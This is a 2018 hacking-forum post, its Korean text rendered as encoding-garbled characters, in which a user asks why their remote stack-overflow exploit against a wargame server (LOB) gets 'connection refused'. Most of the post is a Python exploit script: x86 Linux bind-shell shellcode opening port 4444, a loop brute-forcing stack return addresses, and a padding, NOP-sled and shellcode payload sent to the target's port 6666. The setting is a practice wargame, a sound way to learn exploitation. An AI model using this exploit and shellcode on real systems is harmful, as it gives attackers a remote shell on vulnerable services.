|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=36205 [º¹»ç]
ÁøÂ¥ È¥ÀÚ¼ ¾î¶»°Ôµç ÇØ°áÇغ¸·ÁÇߴµ¥ µµÀúÈ÷ ¸ð¸£°Ú³×¿ä.
¹°¾îº¼ °÷ÀÌ ¾ø¾î¼¤Ì¤Ì ¿©±â¼¶óµµ ¹°¾îº¾´Ï´Ù.
¾Æ·¡´Â ÀÛ¼ºÇÑ ÆÄÀ̽ã3 ÄÚµåÀÔ´Ï´Ù. ÄÚµå µ¹¸®°í,
$ telnet LOB¼¹öÁÖ¼Ò 4444 Çϴµ¥ ÀÚ²Ù connection refused ¶ß³×¿ä
¿Ö±×·±°ÇÁö ¸ð¸£°Ú¾î¿ä. ½©Äڵ尡 ¹®Á¦ÀΰÇÁö.. ´ä´äÇÕ´Ï´Ù
import socket
import struct
# Little Endian ¹æ½ÄÀ¸·Î º¯È¯ÇÏ´Â ÇÔ¼ö p32(x)
p32 = lambda x: struct.pack('<I', x)
# Bind shellcode
shellcode = ""
shellcode += "\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68"
shellcode += "\x11\x5c" # port number 4444
shellcode += "\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56"
shellcode += "\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
shellcode += "\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
shellcode += "\x89\xe1\xcd\x80"
for i in range(0xbfffffff, 0xbfff0000, -48): # NOP Sled°¡ Àֱ⠶§¹®¿¡ -1¾¿ °¨¼ÒÇÏÁö ¾Ê¾Æµµ µÈ´Ù
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IPv4, TCP/IP ÇÁ·ÎÅäÄÝ »ç¿ë
client_socket.connect(('LOB¼¹öÁÖ¼Ò', 6666)) # LOB ¼¹öÀÇ 6666 Æ÷Æ®·Î ¿¬°á
print("Trying to RET_addr : {}".format(hex(i)))
payload = "A"*44 + str(p32(i)) +"\x90"*100 + shellcode
payload = payload.encode()
client_socket.send(payload)
client_socket.close() |
Hit : 8343 Date : 2018/05/30 05:02
|
22018, 
1/1101 
